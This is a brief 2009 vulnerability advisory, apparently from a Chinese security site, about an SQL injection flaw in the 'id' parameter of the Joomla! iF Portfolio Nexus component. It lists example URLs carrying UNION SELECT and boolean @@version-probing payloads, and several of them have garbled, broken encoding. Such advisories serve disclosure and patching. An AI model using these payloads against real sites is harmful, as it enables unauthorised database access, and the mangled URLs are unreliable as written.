Joomla! sql injection vulnerability-vulnerability warning-the black bar safety net

2009-11-24T00:00:00
ID MYHACK58:62200925380
Type myhack58
Reporter 佚名
Modified 2009-11-24T00:00:00

Description

Joomla! the iF Portfolio Nexus Component ’id’ sql injection vulnerability The following example URIs are available: http://www.example.com/services/portfolio?view=item&;id=-100%20union%20all%20select%2 0 1,version%2 8%29,3,4,5,6,7, http://www.example.com/services/portfolio?controller=sections&;view=item&id=-71%20union%20all%20select%201,2,ver http://www.example.com/services/portfolio?controller=sections&;view=item&id=7 1%20and%20substring%2 8@@version,1,1% 2 9=5 http://www.example.com/services/portfolio?view=item&;id=1 0 0 and substring(@@version,1,1)=5